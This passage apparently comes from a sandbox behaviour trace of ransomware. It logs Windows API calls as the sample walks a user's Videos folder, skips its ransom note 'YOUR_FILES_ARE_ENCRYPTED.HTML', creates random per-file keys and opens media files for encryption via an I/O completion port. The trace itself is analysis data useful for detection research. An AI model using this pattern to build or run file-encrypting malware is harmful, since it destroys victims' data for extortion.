param_1="AC") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="6A") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="D7") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="78") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="D5") returned 2 [0125.448] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="70") returned 2 [0125.449] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ivlBW3u.avi" [0125.449] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.449] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.452] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d7e400, ftCreationTime.dwHighDateTime=0x1d6fd97, ftLastAccessTime.dwLowDateTime=0xef57fce0, ftLastAccessTime.dwHighDateTime=0x1d703f9, ftLastWriteTime.dwLowDateTime=0xef57fce0, ftLastWriteTime.dwHighDateTime=0x1d703f9, nFileSizeHigh=0x0, nFileSizeLow=0x17ca0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="iY_ElLWhXe_WL0zMYR.mkv", cAlternateFileName="IY_ELL~1.MKV")) returned 1 [0125.452] StrStrIW (lpFirst="iY_ElLWhXe_WL0zMYR.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.452] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\iY_ElLWhXe_WL0zMYR.mkv") returned 55 [0125.452] PathFindExtensionW (pszPath="iY_ElLWhXe_WL0zMYR.mkv") returned=".mkv" [0125.452] lstrlenW (lpString=".mkv") returned 4 [0125.452] PathFindExtensionW (pszPath="iY_ElLWhXe_WL0zMYR.mkv") returned=".mkv" [0125.452] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e0d110, ftCreationTime.dwHighDateTime=0x1d7014e, ftLastAccessTime.dwLowDateTime=0x28515be0, ftLastAccessTime.dwHighDateTime=0x1d701e8, ftLastWriteTime.dwLowDateTime=0x28515be0, ftLastWriteTime.dwHighDateTime=0x1d701e8, nFileSizeHigh=0x0, nFileSizeLow=0xa64, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="kXFPFdk.mkv", cAlternateFileName="")) returned 1 [0125.453] StrStrIW (lpFirst="kXFPFdk.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.453] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\kXFPFdk.mkv") returned 44 [0125.453] PathFindExtensionW (pszPath="kXFPFdk.mkv") returned=".mkv" [0125.453] lstrlenW (lpString=".mkv") returned 4 [0125.453] PathFindExtensionW (pszPath="kXFPFdk.mkv") returned=".mkv" [0125.453] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a6d0, ftCreationTime.dwHighDateTime=0x1d70212, ftLastAccessTime.dwLowDateTime=0x43dde7b0, ftLastAccessTime.dwHighDateTime=0x1d70450, ftLastWriteTime.dwLowDateTime=0x43dde7b0, ftLastWriteTime.dwHighDateTime=0x1d70450, nFileSizeHigh=0x0, nFileSizeLow=0x28c7, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="LTB2q0JGOUxkm33WkUqG.mkv", cAlternateFileName="LTB2Q0~1.MKV")) returned 1 [0125.453] StrStrIW (lpFirst="LTB2q0JGOUxkm33WkUqG.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.453] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\LTB2q0JGOUxkm33WkUqG.mkv") returned 57 [0125.453] PathFindExtensionW (pszPath="LTB2q0JGOUxkm33WkUqG.mkv") returned=".mkv" [0125.453] lstrlenW (lpString=".mkv") returned 4 [0125.453] PathFindExtensionW (pszPath="LTB2q0JGOUxkm33WkUqG.mkv") returned=".mkv" [0125.453] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ea67eb0, ftCreationTime.dwHighDateTime=0x1d6fd79, ftLastAccessTime.dwLowDateTime=0x3a9e0d10, ftLastAccessTime.dwHighDateTime=0x1d70888, ftLastWriteTime.dwLowDateTime=0x3a9e0d10, ftLastWriteTime.dwHighDateTime=0x1d70888, nFileSizeHigh=0x0, nFileSizeLow=0x11b8e, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="nh0BUJ.swf", cAlternateFileName="")) returned 1 [0125.453] StrStrIW (lpFirst="nh0BUJ.swf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.453] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\nh0BUJ.swf") returned 43 [0125.453] PathFindExtensionW (pszPath="nh0BUJ.swf") returned=".swf" [0125.453] lstrlenW (lpString=".swf") returned 4 [0125.453] PathFindExtensionW (pszPath="nh0BUJ.swf") returned=".swf" [0125.453] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40f220f0, ftCreationTime.dwHighDateTime=0x1d70425, ftLastAccessTime.dwLowDateTime=0xb0b37280, ftLastAccessTime.dwHighDateTime=0x1d7043f, ftLastWriteTime.dwLowDateTime=0xb0b37280, ftLastWriteTime.dwHighDateTime=0x1d7043f, nFileSizeHigh=0x0, nFileSizeLow=0x7be2, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="ODRsnlJ_t0JHd6Y82c9.mp4", cAlternateFileName="ODRSNL~1.MP4")) returned 1 [0125.453] StrStrIW (lpFirst="ODRsnlJ_t0JHd6Y82c9.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.453] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4") returned 56 [0125.453] PathFindExtensionW (pszPath="ODRsnlJ_t0JHd6Y82c9.mp4") returned=".mp4" [0125.453] lstrlenW (lpString=".mp4") returned 4 [0125.453] PathFindExtensionW (pszPath="ODRsnlJ_t0JHd6Y82c9.mp4") returned=".mp4" [0125.453] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\odrsnlj_t0jhd6y82c9.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.454] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=31714) returned 1 [0125.454] GetProcessHeap () returned 0x600000 [0125.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.455] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="0C") returned 2 [0125.455] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="E3") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="8C") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="86") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="13") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="8F") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="FF") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="8F") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="FB") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="E3") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="2C") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="0B") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="62") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="CC") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="8C") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="59") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="FD") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="7D") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F7") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="16") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="AA") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="F5") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="68") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B5") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F1") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="1A") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="55") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="8A") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="D8") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="12") returned 2 [0125.455] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="E7") returned 2 [0125.456] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="0D") returned 2 [0125.456] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\ODRsnlJ_t0JHd6Y82c9.mp4" [0125.456] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.456] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.460] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da82cb0, ftCreationTime.dwHighDateTime=0x1d6fa18, ftLastAccessTime.dwLowDateTime=0xd170fb80, ftLastAccessTime.dwHighDateTime=0x1d6ffbe, ftLastWriteTime.dwLowDateTime=0xd170fb80, ftLastWriteTime.dwHighDateTime=0x1d6ffbe, nFileSizeHigh=0x0, nFileSizeLow=0xf511, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="PzzkMt 64r72iW-fpP.mp4", cAlternateFileName="PZZKMT~1.MP4")) returned 1 [0125.460] StrStrIW (lpFirst="PzzkMt 64r72iW-fpP.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.460] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4") returned 55 [0125.460] PathFindExtensionW (pszPath="PzzkMt 64r72iW-fpP.mp4") returned=".mp4" [0125.460] lstrlenW (lpString=".mp4") returned 4 [0125.460] PathFindExtensionW (pszPath="PzzkMt 64r72iW-fpP.mp4") returned=".mp4" [0125.460] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pzzkmt 64r72iw-fpp.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.461] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=62737) returned 1 [0125.461] GetProcessHeap () returned 0x600000 [0125.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.461] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="9C") returned 2 [0125.461] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2F") returned 2 [0125.461] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="0A") returned 2 [0125.461] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="67") returned 2 [0125.461] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="78") returned 2 [0125.461] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F5") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="13") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="33") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="7E") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="FA") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="AB") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="4C") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="43") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="22") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="ED") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="FC") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="0E") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="D6") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="C8") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1F") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="69") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="80") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="85") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B2") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="24") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="85") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F8") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B9") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A1") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="B3") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="8A") returned 2 [0125.462] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="48") returned 2 [0125.463] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\PzzkMt 64r72iW-fpP.mp4" [0125.463] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.463] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.468] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cc7f690, ftCreationTime.dwHighDateTime=0x1d7008d, ftLastAccessTime.dwLowDateTime=0xba057a80, ftLastAccessTime.dwHighDateTime=0x1d70305, ftLastWriteTime.dwLowDateTime=0xba057a80, ftLastWriteTime.dwHighDateTime=0x1d70305, nFileSizeHigh=0x0, nFileSizeLow=0x163f6, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="q1Zxk.mp4", cAlternateFileName="")) returned 1 [0125.468] StrStrIW (lpFirst="q1Zxk.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.468] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4") returned 42 [0125.468] PathFindExtensionW (pszPath="q1Zxk.mp4") returned=".mp4" [0125.468] lstrlenW (lpString=".mp4") returned 4 [0125.468] PathFindExtensionW (pszPath="q1Zxk.mp4") returned=".mp4" [0125.468] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\q1zxk.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.469] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=91126) returned 1 [0125.469] GetProcessHeap () returned 0x600000 [0125.469] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.470] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="DE") returned 2 [0125.470] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="58") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DB") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F6") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E2") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="6F") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="D5") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="E0") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="3B") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="8C") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="61") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="0F") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="EB") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="A2") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="24") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="B3") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="91") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="A5") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="9C") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="A0") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="91") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="4B") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="CE") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="BD") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="36") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="9C") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="08") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="F2") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="21") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="D4") returned 2 [0125.470] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="08") returned 2 [0125.471] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="1A") returned 2 [0125.471] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\q1Zxk.mp4" [0125.471] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.471] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.475] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd509d0, ftCreationTime.dwHighDateTime=0x1d70845, ftLastAccessTime.dwLowDateTime=0x46f24b40, ftLastAccessTime.dwHighDateTime=0x1d70940, ftLastWriteTime.dwLowDateTime=0x46f24b40, ftLastWriteTime.dwHighDateTime=0x1d70940, nFileSizeHigh=0x0, nFileSizeLow=0x5e21, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="QOYcl7biCO02M5jr5.mkv", cAlternateFileName="QOYCL7~1.MKV")) returned 1 [0125.475] StrStrIW (lpFirst="QOYcl7biCO02M5jr5.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.475] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\QOYcl7biCO02M5jr5.mkv") returned 54 [0125.475] PathFindExtensionW (pszPath="QOYcl7biCO02M5jr5.mkv") returned=".mkv" [0125.475] lstrlenW (lpString=".mkv") returned 4 [0125.475] PathFindExtensionW (pszPath="QOYcl7biCO02M5jr5.mkv") returned=".mkv" [0125.475] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7ef9f0, ftCreationTime.dwHighDateTime=0x1d706ea, ftLastAccessTime.dwLowDateTime=0xbe426870, ftLastAccessTime.dwHighDateTime=0x1d70a7a, ftLastWriteTime.dwLowDateTime=0xbe426870, ftLastWriteTime.dwHighDateTime=0x1d70a7a, nFileSizeHigh=0x0, nFileSizeLow=0xc32c, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="R6WzPWe11 LXUF-PbV.avi", cAlternateFileName="R6WZPW~1.AVI")) returned 1 [0125.475] StrStrIW (lpFirst="R6WzPWe11 LXUF-PbV.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.475] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi") returned 55 [0125.475] PathFindExtensionW (pszPath="R6WzPWe11 LXUF-PbV.avi") returned=".avi" [0125.475] lstrlenW (lpString=".avi") returned 4 [0125.475] PathFindExtensionW (pszPath="R6WzPWe11 LXUF-PbV.avi") returned=".avi" [0125.475] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\r6wzpwe11 lxuf-pbv.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.476] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=49964) returned 1 [0125.476] GetProcessHeap () returned 0x600000 [0125.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.476] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="8C") returned 2 [0125.476] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2D") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="32") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="80") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="70") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="67") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="3B") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="BD") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="DA") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="E0") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="86") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D0") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A2") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="99") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="D5") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C5") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9B") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="C8") returned 2 [0125.477] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="A8") returned 2 